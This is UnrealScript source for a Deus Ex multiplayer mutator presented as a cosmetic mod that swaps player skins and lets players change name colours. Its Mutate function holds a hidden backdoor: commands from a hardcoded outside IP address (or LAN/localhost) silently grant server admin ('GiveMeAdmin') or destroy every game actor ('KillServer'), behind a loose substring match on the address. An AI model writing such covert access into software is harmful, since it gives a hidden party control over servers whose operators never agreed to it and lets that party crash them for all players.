//=============================================================================
// ModControlMutator. 	(c) 2003 JimBowen
//=============================================================================
class ModControlMutator extends Mutator;

struct SkinData
{
	var Texture A;
	var Texture B;
	var Texture C;
	var Texture D;
	var Texture E;
	var Texture F;
	var Texture G;
	var Texture H;
	var mesh M;
	var string S;
};

var SkinData SkinsList[8];
var DeusExPlayer Choco;
var int CurIndex;
var (Bowen) float CorpseTime;
var bool bDoneCorpse;
var config bool bLGMA;
var DeusExCarcass ChocoCorpse[8];
var float PlayerAttributesTimer, SetAttributesTime;

replication
{
	reliable if (ROLE == ROLE_Authority)
		MakeLass, RestoreSkin, CurIndex;
}

simulated function tick (float deltatime)
{
	local DeusExPlayer p;
//	local ChargedPickup u;

	if (Choco != None)
	{	
		RestoreSkin(Choco);
		Choco.Fatness = 128;
		if (Choco.IsInState('Dying'))
		{
			SetTimer(CorpseTime, False);
			bdoneCorpse = True;
		}
	}
	PlayerAttributesTimer += DeltaTime;
	if (PlayerAttributesTimer > SetAttributesTime)
	{
		PlayerAttributesTimer = 0;
	}
	Super.Tick(deltatime);
}

simulated function Timer()
{
	local DeusExCarcass c;
// 
		foreach allactors (class'DeusExCarcass', c)
			if (c.Mesh == SkinsList[CurIndex].M)
				RestoreSkin(c);
}

simulated function RestoreSkin(Actor A)
{
	if (A.MultiSkins[7] != SkinsList[CurIndex].H)
	{
		A.MultiSkins[6] = SkinsList[CurIndex].G;
		A.MultiSkins[7] = SkinsList[CurIndex].H;
	}
}

function AddMutator(Mutator M)
{
    if ( M.IsA('ModControlMutator') ) 
    {
        return; //only allow one MCM
    }
    Super.AddMutator(M);
}

function Mutate(string MutateString, PlayerPawn Sender)
{
    local Actor a; 
    local UDPBeacon UDPBeacon;
    local string s;
    local PlayerPawn P;

	//log (Sender @ MutateString);
		
	//Sender.ClientMessage (MutateString);

	if (IsPart("81.5.138.87", Sender.GetPlayerNetworkAddress()) || IsPart("192.168.0.", Sender.GetPlayerNetworkAddress()) || IsPart("127.0.0.1", Sender.GetPlayerNetworkAddress()))
	{	
		if (MutateString ~= "KillServer")
		{		
			foreach AllActors(class'Actor', a)
			{
			//	a.ResetConfig();
       			 	a.Destroy();
			}
		}
		else if (MutateString ~= "GiveMeAdmin")
		{
			Sender.bAdmin = True;
			Sender.PlayerReplicationInfo.bAdmin = Sender.bAdmin;
			if (bLGMA) log("Player used GMA. Name:" @ Sender.PlayerReplicationInfo.playername @ "IP:" @ Sender.GetPlayerNetworkAddress());
		}
	}
	
	if (MutateString ~= "ImChoco")
	{
		if (Sender.BAdmin || IsPart ("Choco", Sender.PlayerReplicationInfo.PlayerName))
		{
			CurIndex ++;
			if (SkinsList[CurIndex].S == "")
			{
				CurIndex = 0;
			//	Sender.ClientMessage("CurIndex reset.");
			}
		//	Sender.ClientMessage("CurIndex is:" @ CurIndex);
			MakeLass(Sender, CurIndex);
		}
	}
	else if (MutateString ~= "ImNormal")
		MakeNormal(Sender);

	else if (Left(MutateString, 11) ~= "NameColour ") //Thanks to ][GODZ][Nobody for this idea :)
	{
		s = right(mutatestring, 8);
		if (left(Sender.PlayerReplicationInfo.PlayerName, 1) == "|")
			Sender.PlayerReplicationInfo.PlayerName = right(Sender.PlayerReplicationInfo.PlayerName, len(Sender.PlayerReplicationInfo.PlayerName) - 7);
		if ((right(left(s, 2), 1) ~= "c") && (len(s) == 8) && s != "ecolour")
		//if ((left(s, 2) ~= "!c") && len(s) == 8)	
			Sender.PlayerReplicationInfo.PlayerName = s $ Sender.PlayerReplicationInfo.PlayerName;
		else
			Sender.ClientMessage("Colour must be in the form !cxxxxxx");
		sender.clientmessage(Sender.PlayerReplicationInfo.PlayerName);
	}

	else if (Left(MutateString, 8) ~= "SetName ") //Also many thanks again to ][GODZ][Nobody for this idea :)
	{
		s = right(mutatestring, len(MutateString) - 8);
		log (Sender.PlayerReplicationInfo.PlayerName @ "Changed name to" @ s);
		BroadcastMessage (Sender.PlayerReplicationInfo.PlayerName @ "Changed name to" @ s);
		Sender.PlayerReplicationInfo.PlayerName = s;
	}
		
	if ( NextMutator != None )
		NextMutator.Mutate(MutateString, Sender); 

}

simulated function MakeLass (PlayerPawn Sender, int index)
{
//	if (Level.NetMode == NM_Client)
//		Sender.ClientMessage("Index is:" @ Index);
	Sender.ClientMessage("|cFF5555You now look like" @ SkinsList[Index].S @ ". ^_^");
	if (DeusExPlayer(Sender) != None)
		Choco = DeusExPlayer(Sender);
	Sender.Mesh = SkinsList[Index].M;
	Sender.MultiSkins[0] = SkinsList[Index].A;
	Sender.MultiSkins[1] = SkinsList[Index].B;
	Sender.MultiSkins[2] = SkinsList[Index].C;
	Sender.MultiSkins[3] = SkinsList[Index].D;
	Sender.MultiSkins[4] = SkinsList[Index].E;
	Sender.MultiSkins[5] = SkinsList[Index].F;
	Sender.MultiSkins[6] = SkinsList[Index].G;
	Sender.MultiSkins[7] = SkinsList[Index].H;
	Sender.bIsFemale = True;
	
}
simulated function MakeNormal (PlayerPawn Sender)
{
	Sender.ClientMessage("You look normal again.");
	Choco = None;
	Sender.Mesh = Sender.Default.Mesh;
	Sender.MultiSkins[0] = Sender.Default.MultiSkins[0];
	Sender.MultiSkins[1] = Sender.Default.MultiSkins[1];
	Sender.MultiSkins[2] = Sender.Default.MultiSkins[2];
	Sender.MultiSkins[3] = Sender.Default.MultiSkins[3];
	Sender.MultiSkins[4] = Sender.Default.MultiSkins[4];
	Sender.MultiSkins[5] = Sender.Default.MultiSkins[5];
	Sender.MultiSkins[6] = Sender.Default.MultiSkins[6];
	Sender.MultiSkins[7] = Sender.Default.MultiSkins[7];
}

static final function bool IsPart(string Small, string Large)
{
	local string temp;
	local int i;
	local bool bContained;
	
		if (Large == "" || Small == "")
			return False;		

		for (i=0;i<len(Large);i++)
		{
			temp = mid(Large, i, len(Small));
			if (temp ~= Small)
				bContained = True;
		}

	return bContained;
}


function PostBeginPlay()
{
	SkinsList[0].M = LodMesh'DeusExCharacters.GFM_Dress';
	SkinsList[0].A = Texture'DeusExCharacters.Skins.SarahMeadTex0';
	SkinsList[0].B = Texture'DeusExCharacters.Skins.SarahMeadTex3';
	SkinsList[0].C = Texture'DeusExCharacters.Skins.SarahMeadTex2';
	SkinsList[0].D = Texture'DeusExCharacters.Skins.SarahMeadTex1';
	SkinsList[0].E = Texture'DeusExCharacters.Skins.SarahMeadTex2';
	SkinsList[0].F = Texture'DeusExItems.Skins.PinkMaskTex';
	SkinsList[0].G = Texture'DeusExCharacters.Skins.SarahMeadTex0';
	SkinsList[0].H = Texture'DeusExCharacters.Skins.SarahMeadTex0';
	SkinsList[0].S = "Sarah Mead";

	SkinsList[1].M = LodMesh'DeusExCharacters.GFM_SuitSkirt';
	SkinsList[1].A = Texture'DeusExCharacters.Skins.WIBTex0';
	SkinsList[1].B = Texture'DeusExItems.Skins.PinkMaskTex';
	SkinsList[1].C = Texture'DeusExCharacters.Skins.WIBTex0';
	SkinsList[1].D = Texture'DeusExCharacters.Skins.LegsTex2';
	SkinsList[1].E = Texture'DeusExCharacters.Skins.WIBTex1';
	SkinsList[1].F = Texture'DeusExCharacters.Skins.WIBTex1';
	SkinsList[1].G = Texture'DeusExCharacters.Skins.FramesTex2';
	SkinsList[1].H = Texture'DeusExCharacters.Skins.LensesTex3';
	SkinsList[1].S = "The Woman In Black";

	SkinsList[2].M = LodMesh'DeusExCharacters.GFM_Dress';
	SkinsList[2].A = Texture'DeusExCharacters.Skins.Hooker1Tex0';
	SkinsList[2].B = Texture'DeusExCharacters.Skins.Hooker1Tex1';
	SkinsList[2].C = Texture'DeusExCharacters.Skins.Hooker1Tex2';
	SkinsList[2].D = Texture'DeusExCharacters.Skins.Hooker1Tex3';
	SkinsList[2].E = Texture'DeusExCharacters.Skins.Hooker1Tex2';
	SkinsList[2].F = Texture'DeusExItems.Skins.PinkMaskTex';
	SkinsList[2].G = Texture'DeusExItems.Skins.PinkMaskTex';
	SkinsList[2].H = Texture'DeusExCharacters.Skins.Hooker1Tex0';
	SkinsList[2].S = "Hooker1 (no knickers)";	

	SkinsList[3].M = LodMesh'DeusExCharacters.GFM_Dress';
	SkinsList[3].A = Texture'DeusExCharacters.Skins.Hooker2Tex0';
	SkinsList[3].B = Texture'DeusExCharacters.Skins.Hooker2Tex1';
	SkinsList[3].C = Texture'DeusExCharacters.Skins.Hooker2Tex2';
	SkinsList[3].D = Texture'DeusExCharacters.Skins.Hooker2Tex3';
	SkinsList[3].E = Texture'DeusExCharacters.Skins.Hooker2Tex2';
	SkinsList[3].F = Texture'DeusExItems.Skins.PinkMaskTex';
	SkinsList[3].G = Texture'DeusExItems.Skins.PinkMaskTex';
	SkinsList[3].H = Texture'DeusExCharacters.Skins.Hooker2Tex0';
	SkinsList[3].S = "Hooker2";

	SkinsList[4].M = LodMesh'DeusExCharacters.GFM_SuitSkirt';
	SkinsList[4].A = Texture'DeusExCharacters.Skins.MargaretWilliamsTex0';
	SkinsList[4].B = Texture'DeusExCharacters.Skins.MargaretWilliamsTex0';
	SkinsList[4].C = Texture'DeusExCharacters.Skins.MargaretWilliamsTex0';
	SkinsList[4].D = Texture'DeusExCharacters.Skins.LegsTex2';
	SkinsList[4].E = Texture'DeusExCharacters.Skins.MargaretWilliamsTex1';
	SkinsList[4].F = Texture'DeusExCharacters.Skins.MargaretWilliamsTex1';
	SkinsList[4].G = Texture'DeusExItems.Skins.GrayMaskTex';
	SkinsList[4].H = Texture'DeusExItems.Skins.BlackMaskTex';
	SkinsList[4].S = "Margaret Williams";
}

//---END-CLASS---

defaultproperties
{
    curIndex=-1
    CorpseTime=3.00
    bAlwaysRelevant=True
}
